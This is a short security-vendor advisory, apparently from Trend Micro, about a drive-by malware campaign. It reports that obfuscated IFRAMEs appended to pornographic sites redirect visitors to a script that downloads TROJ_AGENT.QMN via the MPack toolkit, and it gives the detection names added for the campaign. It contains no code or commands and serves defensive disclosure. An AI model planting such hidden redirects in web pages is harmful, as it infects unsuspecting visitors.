Be careful in searching for porn sites, you may get other forms of “malicious” content that is definitely undesireable.

Just a few days after the infamous Italian Job malware, Trend Micro found another one with a similar modus operandi, but instead of hacked Italian web sites, the infection chain starts on certain pornographic sites.


The pornographic sites, which tend to specialize on incestuous content, has an obfuscated IFRAME code appended at the end of the HTML code. This IFRAME redirects to another domain that will serve a script file to download a copy of TROJ_AGENT.QMN. Right now, we are not sure whether the porn sites are compromised to host the IFRAMES, are created to do so, or are being paid to host the IFRAMES.



The detections for web pages containing the obfuscated IFRAME code, as well as the script file that downloads TROJ_AGENT.QMN are still being created as of writing.

This particular attack uses the tookit MPack v0.86, the same one used in the Italian Job attack, and, despite only having 197 domains with IFRAMEs (as compared to the Italian Job’s 10,000++ domains), are able to infect twice as much as the Italian Job.

It is most likely this attack was made online sometime last week, around June 17, based on Trend Micro’s World Virus Tracking Center.

Update: The pages containing the obfuscated IFRAME code will now be detected as HTML_IFRAME.CV and the file that downloads TROJ_AGENT.QMN will be detected as JS_DLOADER.NUF. You may now view the reports for these malware in our Virus Encyclopedia.